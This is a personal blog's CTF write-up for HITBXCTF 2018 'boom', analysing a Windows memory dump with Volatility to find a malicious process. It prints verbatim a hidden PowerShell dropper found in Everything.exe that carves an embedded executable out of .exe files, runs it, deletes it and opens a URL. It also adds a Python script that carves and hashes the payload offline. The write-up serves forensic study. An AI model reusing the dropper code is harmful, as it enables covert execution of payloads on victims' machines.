A box of chocolate

my public personal notebook

HITBXCTF 2018 Quals - boom

We are given a .vmem file, which is a memory file generated by VMware. The problem description indicates that this VM might be infected with malware, so let's use Volatility to analyze this memory dump.

Let's check what OS this memory dump is running:

$ volatility -f BOOM-6452e9b9.vmem imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win2008R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (.../BOOM-6452e9b9.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80003fff0a0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80004000d00L
                KPCR for CPU 1 : 0xfffff880009ef000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2018-04-05 08:29:56 UTC+0000
     Image local date and time : 2018-04-05 16:29:56 +0800

Let's treat the running OS as Win7SP1x64 and list the processes:

$ volatility -f BOOM-6452e9b9.vmem --profile=Win7SP1x64 psscan
Volatility Foundation Volatility Framework 2.5
Offset(P)          Name                PID   PPID PDB                Time created                   Time exited
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x000000007d0d81f0 msdtc.exe          1992    516 0x0000000077525000 2018-04-04 15:28:29 UTC+0000
0x000000007d0dab30 cmd.exe            1348   1212 0x0000000038154000 2018-04-05 08:27:22 UTC+0000   2018-04-05 08:27:39 UTC+0000
0x000000007d109b30 dllhost.exe        1896    516 0x000000004599c000 2018-04-04 15:28:29 UTC+0000
0x000000007d248b30 svchost.exe         600    516 0x00000000145af000 2018-04-04 15:28:26 UTC+0000
0x000000007d285540 svchost.exe        1112    516 0x0000000017541000 2018-04-04 15:28:27 UTC+0000
0x000000007d28a5b0 explorer.exe       2532   2492 0x0000000034c9e000 2018-04-04 15:30:26 UTC+0000
0x000000007d290b30 spoolsv.exe        1212    516 0x0000000017755000 2018-04-04 15:28:27 UTC+0000
0x000000007d2af1a0 mscorsvw.exe       2764    516 0x000000006a0e7000 2018-04-04 15:30:28 UTC+0000
0x000000007d2de7e0 svchost.exe        1244    516 0x00000000186fc000 2018-04-04 15:28:27 UTC+0000
0x000000007d3b4060 VGAuthService.     1384    516 0x00000000178e6000 2018-04-04 15:28:27 UTC+0000
0x000000007d3e4210 vmtoolsd.exe       1456    516 0x000000001676c000 2018-04-04 15:28:28 UTC+0000
0x000000007d3e9b30 ManagementAgen     1480    516 0x00000000162f2000 2018-04-04 15:28:28 UTC+0000
0x000000007d413060 winlogon.exe        480    408 0x0000000020cf6000 2018-04-04 15:28:26 UTC+0000
0x000000007d428b30 services.exe        516    416 0x00000000086a2000 2018-04-04 15:28:26 UTC+0000
0x000000007d434060 lsm.exe             540    416 0x000000001f851000 2018-04-04 15:28:26 UTC+0000
0x000000007d436610 lsass.exe           532    416 0x000000001f649000 2018-04-04 15:28:26 UTC+0000
0x000000007d50e970 svchost.exe         664    516 0x000000001c541000 2018-04-04 15:28:26 UTC+0000
0x000000007d532920 vmacthlp.exe        724    516 0x000000001ee7b000 2018-04-04 15:28:26 UTC+0000
0x000000007d53eb30 svchost.exe         768    516 0x0000000053d03000 2018-04-04 15:28:26 UTC+0000
0x000000007d571060 svchost.exe         832    516 0x000000005378d000 2018-04-04 15:28:26 UTC+0000
0x000000007d57cb30 svchost.exe         892    516 0x000000005329a000 2018-04-04 15:28:26 UTC+0000
0x000000007d5a8b30 svchost.exe         936    516 0x00000000125a5000 2018-04-04 15:28:26 UTC+0000
0x000000007d8d1060 wininit.exe         416    344 0x0000000021861000 2018-04-04 15:28:26 UTC+0000
0x000000007d8db7b0 csrss.exe           432    408 0x0000000021bf0000 2018-04-04 15:28:26 UTC+0000
0x000000007da5cb30 csrss.exe           364    344 0x0000000021ddb000 2018-04-04 15:28:25 UTC+0000
0x000000007e243b30 WmiPrvSE.exe       1852    664 0x000000000e653000 2018-04-04 15:28:29 UTC+0000
0x000000007e94bb30 smss.exe            276      4 0x0000000023138000 2018-04-04 15:28:25 UTC+0000
0x000000007e9cab30 taskhost.exe       2388    516 0x0000000074651000 2018-04-04 15:30:26 UTC+0000
0x000000007ed2e810 Everything.exe     3764   1564 0x0000000077807000 2018-04-05 08:29:20 UTC+0000
0x000000007edb62b0 ipconfig.exe       3440   3372 0x000000002ef83000 2018-04-05 08:29:56 UTC+0000   2018-04-05 08:29:56 UTC+0000
0x000000007efbe330 SearchFilterHo     1260   3016 0x000000002ddfe000 2018-04-05 08:29:06 UTC+0000
0x000000007efc7540 audiodg.exe        3960    832 0x000000003eefe000 2018-04-05 08:29:20 UTC+0000
0x000000007efcc5f0 cmd.exe            3372   1456 0x000000003fe85000 2018-04-05 08:29:56 UTC+0000   2018-04-05 08:29:56 UTC+0000
0x000000007f0e5a30 dwm.exe            2508    892 0x0000000073675000 2018-04-04 15:30:26 UTC+0000
0x000000007f67bb30 dllhost.exe        2364    664 0x0000000049662000 2018-04-04 15:49:16 UTC+0000
0x000000007f773680 netsh.exe          2428   1212 0x0000000034bde000 2018-04-05 08:28:07 UTC+0000   2018-04-05 08:28:07 UTC+0000
0x000000007f78eb30 svchost.exe        1088    516 0x000000004771d000 2018-04-04 15:41:44 UTC+0000
0x000000007f7e1460 StikyNot.exe       2252   2532 0x00000000379a7000 2018-04-04 15:49:33 UTC+0000
0x000000007f834b30 SearchIndexer.     3016    516 0x000000003ae0d000 2018-04-04 15:30:30 UTC+0000
0x000000007f860b30 svchost.exe        2968    516 0x0000000015308000 2018-04-04 15:30:29 UTC+0000
0x000000007f9d6060 cmd.exe            1096   1212 0x00000000752ec000 2018-04-05 08:25:33 UTC+0000   2018-04-05 08:26:49 UTC+0000
0x000000007f9ec060 sc.exe             3064   1212 0x00000000332be000 2018-04-05 08:28:07 UTC+0000   2018-04-05 08:28:07 UTC+0000
0x000000007fa5d060 wordpad.exe        3316   1564 0x0000000041a4b000 2018-04-05 08:29:50 UTC+0000
0x000000007fa7f060 conhost.exe        3368    364 0x000000000ca7a000 2018-04-05 08:29:56 UTC+0000   2018-04-05 08:29:56 UTC+0000
0x000000007faa7390 rdpclip.exe        2460   1112 0x0000000071564000 2018-04-05 08:29:07 UTC+0000
0x000000007fac6b30 taskhost.exe       1340    516 0x000000006d95f000 2018-04-05 08:29:07 UTC+0000
0x000000007fb0bb30 SearchProtocol     1820   3016 0x00000000744a7000 2018-04-05 08:29:26 UTC+0000
0x000000007fb15b30 dwm.exe            2228    892 0x0000000032414000 2018-04-05 08:29:07 UTC+0000
0x000000007fb23b30 explorer.exe       1564   1624 0x0000000066338000 2018-04-05 08:29:07 UTC+0000
0x000000007fb74060 vmtoolsd.exe       2632   2532 0x0000000070551000 2018-04-04 15:30:26 UTC+0000
0x000000007fbb9b30 svchost.exe        2800    516 0x000000006a6f5000 2018-04-04 15:30:28 UTC+0000
0x000000007fbcf060 mscorsvw.exe       2880    516 0x000000006a1fc000 2018-04-04 15:30:29 UTC+0000
0x000000007fbfc060 sppsvc.exe         2932    516 0x000000002c482000 2018-04-04 15:30:29 UTC+0000
0x000000007fca0b30 winlogon.exe        888   2092 0x00000000304c0000 2018-04-05 08:28:11 UTC+0000
0x000000007fccab30 csrss.exe          1836   2092 0x000000002f03b000 2018-04-05 08:28:11 UTC+0000
0x000000007fd228d0 csrss.exe          2984   2380 0x000000001bbb9000 2018-04-05 08:29:06 UTC+0000
0x000000007fd36b30 regsvr32.exe       2736   1564 0x0000000064a39000 2018-04-05 08:29:08 UTC+0000   2018-04-05 08:29:08 UTC+0000
0x000000007fdec630 vmtoolsd.exe       3748   1564 0x0000000045e6b000 2018-04-05 08:29:19 UTC+0000
0x000000007fdf3b30 winlogon.exe       2212   2380 0x00000000121be000 2018-04-05 08:29:06 UTC+0000
0x000000007feb2060 SearchProtocol     2752   3016 0x000000002e873000 2018-04-05 08:29:06 UTC+0000
0x000000007feb8b30 LogonUI.exe        1672   2212 0x000000003a14d000 2018-04-05 08:29:06 UTC+0000
0x000000007ff39990 System                4      0 0x0000000000187000 2018-04-04 15:28:25 UTC+0000

Everything.exe seems shady. Let's dump it:

$ volatility -f BOOM-6452e9b9.vmem --profile=Win7SP1x64 procdump -p 3764 -D .
Volatility Foundation Volatility Framework 2.5
Process(V)         ImageBase          Name                 Result
------------------ ------------------ -------------------- ------
0xfffffa8002b2e810 0x0000000000400000 Everything.exe       OK: executable.3764.exe

As with many memory forensics challenges, it is quite useful to run strings on it:

$ strings executable.3764.exe
... [snip]
...
powershell -WindowStyle Hidden -Command "Get-ChildItem .\ | ForEach-Object -Process {if($_ -is [System.IO.FileInfo]){if($_.FullName.indexof(""".exe""") -eq -1){return;}$cont = (Get-Content -raw $_.FullName);if($cont.indexof("""qwedcxzarfvbnhyt""") -eq -1){return;}echo $_.FullName;[byte[]]$bytes = [System.IO.File]::ReadAllBytes($_.FullName);Set-Content -Path """.\temp.exe""" -Value $Bytes[-0X19010..-0X11] -encoding Byte;.\temp.exe;rm .\temp.exe;}};Start-Process -FilePath http://HYTN_B_C_DoRR_.cn;"

Looks like there is something related to PowerShell inside this executable, which makes it even more shady. Some reverse engineering confirms this: the process entry point is overwritten with code that runs the above command. Start-Process -FilePath with a URL will open a browser window on that URL, which explains the weird paths mentioned in the problem description.
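The one-liner above is a small dropper: it looks for .exe files in the current directory containing the marker string, carves the byte range $Bytes[-0X19010..-0X11] out of each hit into temp.exe, runs it, and deletes it. The following is an added triage script, not part of the original writeup or the challenge, that performs the same marker check and carve in Python so the embedded bytes can be hashed and inspected offline instead of executed; the sample host file it scans is constructed here, not real malware.

```python
import hashlib
from pathlib import Path

# Values taken from the PowerShell one-liner recovered from Everything.exe.
MARKER = b"qwedcxzarfvbnhyt"
# $Bytes[-0X19010..-0X11]: PowerShell negative indices count from the end and
# the range is inclusive at both ends, so 0x19000 bytes are carved, ending
# 0x10 bytes before EOF.
START_FROM_END = 0x19010
END_FROM_END = 0x11


def carve_embedded_payload(data: bytes):
    """Return the bytes the dropper would write to temp.exe, or None when the
    file lacks the marker or is too short to hold the carved region."""
    if MARKER not in data or len(data) < START_FROM_END:
        return None
    end = len(data) - END_FROM_END + 1  # inclusive upper bound, hence +1
    return data[len(data) - START_FROM_END:end]


def triage_blob(name: str, data: bytes):
    """Summarise one candidate file. Like the dropper's
    FullName.indexof(".exe") check, only names containing '.exe' count."""
    if ".exe" not in name:
        return None
    payload = carve_embedded_payload(data)
    if payload is None:
        return None
    return {
        "file": name,
        "carved_len": len(payload),
        "looks_like_pe": payload[:2] == b"MZ",
        "sha256": hashlib.sha256(payload).hexdigest(),
    }


def scan_directory(directory):
    """Report every file in a directory the dropper would have fired on,
    without ever executing the carved bytes."""
    hits = []
    for path in Path(directory).iterdir():
        if path.is_file():
            hit = triage_blob(path.name, path.read_bytes())
            if hit:
                hits.append(hit)
    return hits


# Constructed sample (not a real malware file): a fake host .exe carrying the
# marker, a PE-looking payload filling exactly the carved region, and 0x10
# trailing bytes so the payload ends where the dropper's range ends.
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * (0x19000 - 2)
SAMPLE_HOST = (b"MZ" + b"\x00" * 64 + b"host " + MARKER + b"\x00" * 32
               + SAMPLE_PAYLOAD + b"\x00" * 0x10)

if __name__ == "__main__":
    print(triage_blob("suspect.exe", SAMPLE_HOST))
```

Point scan_directory at a copied-out directory to list which files would have triggered the dropper and the hash of each carved region.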

The flag doesn't follow the normal format; it is the domain name we just found: HYTN_B_C_DoRR_.cn

I learned a lot of useful and fun tricks while solving this problem; however, my time for the writeup is limited, so I'll add them later :3